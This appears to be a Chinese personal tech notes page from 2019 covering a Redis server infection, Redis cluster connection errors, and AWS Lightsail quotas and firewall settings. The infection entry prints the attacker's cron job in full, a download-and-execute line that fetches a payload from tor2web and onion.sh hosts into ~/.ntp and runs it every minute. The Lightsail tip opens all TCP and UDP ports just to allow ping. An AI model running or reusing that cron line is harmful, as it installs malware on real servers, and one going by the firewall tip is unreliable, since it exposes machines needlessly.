2019年9月

REDIS0006病毒的发现和解决

发现服务器SSH无法登录,最关键的是redis数据被反复清除,后来发现是redis中毒了,有些类似以前的挖坑病毒。基本特征为:
1:会定时清理redis数据
2:SSH无法登录,更改后也无法登录
这个病毒在定时任务里面,每分钟会做一些事情,没详细看,具体的病毒为:

*/1 * * * * (tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(cu
rl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" !=
 "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && cur
l="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc
 "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do 
strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi
; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" 
> /etc/hosts >/dev/null 2>&1; fi;  ${curl} -fsSLk --max-time 40 https://7xffbbbebumizpeg.t
or2web.su/src/ldm2 -o ~/.ntp||${curl} -fsSLk --max-time 40 https://7xffbbbebumizpeg.tor2we
b.io/src/ldm2 -o ~/.ntp||${curl} -fsSLk --max-time 40 https://7xffbbbebumizpeg.onion.sh/sr
c/ldm2 -o ~/.ntp||wget --quiet --no-check-certificate --timeout=40 https://7xffbbbebumizpe
g.tor2web.su/src/ldm2 -O ~/.ntp||wget --quiet --no-check-certificate --timeout=40 https://
7xffbbbebumizpeg.tor2web.io/src/ldm2 -O ~/.ntp||wget --quiet --no-check-certificate --time
out=40 https://7xffbbbebumizpeg.onion.sh/src/ldm2 -O ~/.ntp) && chmod +x ~/.ntp && sh ~/.n
tp

redis cluster遇到的问题

在做redis集群的时候遇到了一些问题:
1:(error) CLUSTERDOWN The cluster is down
确保其它节点正常工作
2:connection refused 和Could not get a resource from the pool
单节点链接没问题,集群的时候链接就不行了,通过外面IP单独访问端口都是通的,核心现象是集群通过外网IP访问就会报错,无奈最后放弃,直接通过局域网的IP访问才可以使用,也就是说集群在局域网没问题,目前这个问题待解决。

aws常见问题

1:账号资源达到最大限制
例如Your AWS account is pending verification. Sorry, you've reached your current Lightsail resource maximum limit of Instance : 0
解决方法:
提交case,解除最大限制 ,大多数服务限制可通过 AWS 支持中心(https://console.aws.amazon.com/support/home)申请,方法是选择 Create Case(创建案例),再选择 Service Limit Increase(提高服务限制)

2:aws lightsail不允许ping
其实是可以,networking>firewall: Allow TCP+UDP 0-65535